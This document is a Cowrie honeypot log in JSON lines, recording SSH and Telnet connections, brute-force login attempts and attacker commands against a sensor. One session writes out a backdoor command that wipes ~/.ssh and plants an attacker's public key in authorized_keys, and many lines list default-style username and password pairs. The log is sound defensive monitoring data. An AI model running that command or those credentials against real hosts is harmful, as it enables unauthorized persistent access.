{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:20:05.237290Z","src_ip":"172.174.5.146","session":"da0051526cb4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:20:05.719423Z","src_ip":"172.174.5.146","session":"da0051526cb4"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:05.834022Z","src_ip":"172.174.5.146","session":"a240dc211e85"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:05.835238Z","src_ip":"172.174.5.146","session":"da0051526cb4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33132,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7db213311da","protocol":"ssh","message":"New connection: 212.227.125.160:33132 (1.2.3.4:22) [session: b7db213311da]","sensor":"my-vps","timestamp":"2025-08-28T06:20:07.682453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:20:07.683729Z","src_ip":"212.227.125.160","session":"b7db213311da"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:20:07.907045Z","src_ip":"212.227.125.160","session":"b7db213311da"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:08.578695Z","src_ip":"212.227.125.160","session":"b7db213311da"}
{"eventid":"cowrie.session.closed","duration":31.30311918258667,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:09.673956Z","src_ip":"8.222.212.69","session":"8cabe8eaf348"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:09.808715Z","src_ip":"212.227.125.160","session":"b7db213311da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53996,"dst_ip":"1.2.3.4","dst_port":22,"session":"b884b16b6b62","protocol":"ssh","message":"New connection: 212.227.235.229:53996 (1.2.3.4:22) [session: b884b16b6b62]","sensor":"my-vps","timestamp":"2025-08-28T06:20:14.357955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:20:14.359206Z","src_ip":"212.227.235.229","session":"b884b16b6b62"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:20:14.611037Z","src_ip":"212.227.235.229","session":"b884b16b6b62"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:15.366737Z","src_ip":"212.227.235.229","session":"b884b16b6b62"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:16.619746Z","src_ip":"212.227.235.229","session":"b884b16b6b62"}
{"eventid":"cowrie.session.connect","src_ip":"103.165.236.27","src_port":45350,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fc6c5413a8d","protocol":"ssh","message":"New connection: 103.165.236.27:45350 (1.2.3.4:22) [session: 6fc6c5413a8d]","sensor":"my-vps","timestamp":"2025-08-28T06:20:21.188827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:20:21.190286Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:20:21.375653Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa147258369","message":"login attempt [root/Aa147258369] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:20:22.160846Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:20:22.552672Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:20:22.553187Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:20:22.555096Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:22.741309Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:20:23.242484Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:20:23.243298Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:20:23.431598Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:23.432497Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.session.connect","src_ip":"103.165.236.27","src_port":45354,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac089d46ed45","protocol":"ssh","message":"New connection: 103.165.236.27:45354 (1.2.3.4:22) [session: ac089d46ed45]","sensor":"my-vps","timestamp":"2025-08-28T06:20:23.615456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:20:23.616576Z","src_ip":"103.165.236.27","session":"ac089d46ed45"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:20:23.802557Z","src_ip":"103.165.236.27","session":"ac089d46ed45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36774,"dst_ip":"1.2.3.4","dst_port":22,"session":"62486eb9ee72","protocol":"ssh","message":"New connection: 212.227.125.160:36774 (1.2.3.4:22) [session: 62486eb9ee72]","sensor":"my-vps","timestamp":"2025-08-28T06:20:24.081797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:20:24.082472Z","src_ip":"212.227.125.160","session":"62486eb9ee72"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:20:24.297739Z","src_ip":"212.227.125.160","session":"62486eb9ee72"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:24.584827Z","src_ip":"103.165.236.27","session":"ac089d46ed45"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:24.944894Z","src_ip":"212.227.125.160","session":"62486eb9ee72"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:25.771693Z","src_ip":"103.165.236.27","session":"ac089d46ed45"}
{"eventid":"cowrie.session.connect","src_ip":"103.165.236.27","src_port":45364,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bf4ce42d80e","protocol":"ssh","message":"New connection: 103.165.236.27:45364 (1.2.3.4:22) [session: 7bf4ce42d80e]","sensor":"my-vps","timestamp":"2025-08-28T06:20:25.955617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:20:25.957225Z","src_ip":"103.165.236.27","session":"7bf4ce42d80e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:20:26.142490Z","src_ip":"103.165.236.27","session":"7bf4ce42d80e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:26.161736Z","src_ip":"212.227.125.160","session":"62486eb9ee72"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:20:26.923609Z","src_ip":"103.165.236.27","session":"7bf4ce42d80e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:27.110470Z","src_ip":"103.165.236.27","session":"7bf4ce42d80e"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:27.111484Z","src_ip":"103.165.236.27","session":"6fc6c5413a8d"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":44798,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c8c1e96c00a","protocol":"telnet","message":"New connection: 3.132.23.201:44798 (1.2.3.4:23) [session: 7c8c1e96c00a]","sensor":"my-vps","timestamp":"2025-08-28T06:20:29.239778Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:29.338146Z","src_ip":"3.132.23.201","session":"7c8c1e96c00a"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:29.339166Z","src_ip":"3.132.23.201","session":"7c8c1e96c00a"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:29.340171Z","src_ip":"3.132.23.201","session":"7c8c1e96c00a"}
{"eventid":"cowrie.session.closed","duration":0.2565493583679199,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:29.496226Z","src_ip":"3.132.23.201","session":"7c8c1e96c00a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38326,"dst_ip":"1.2.3.4","dst_port":22,"session":"94804951e22a","protocol":"ssh","message":"New connection: 212.227.235.229:38326 (1.2.3.4:22) [session: 94804951e22a]","sensor":"my-vps","timestamp":"2025-08-28T06:20:30.602168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:20:30.603068Z","src_ip":"212.227.235.229","session":"94804951e22a"}
{"eventid":"cowrie.session.closed","duration":31.682698726654053,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:30.625856Z","src_ip":"8.222.212.69","session":"6bf3b84b1d9b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:20:30.847914Z","src_ip":"212.227.235.229","session":"94804951e22a"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:31.585530Z","src_ip":"212.227.235.229","session":"94804951e22a"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:32.833643Z","src_ip":"212.227.235.229","session":"94804951e22a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36118,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea48e117f8c7","protocol":"ssh","message":"New connection: 212.227.125.160:36118 (1.2.3.4:22) [session: ea48e117f8c7]","sensor":"my-vps","timestamp":"2025-08-28T06:20:40.505352Z"}
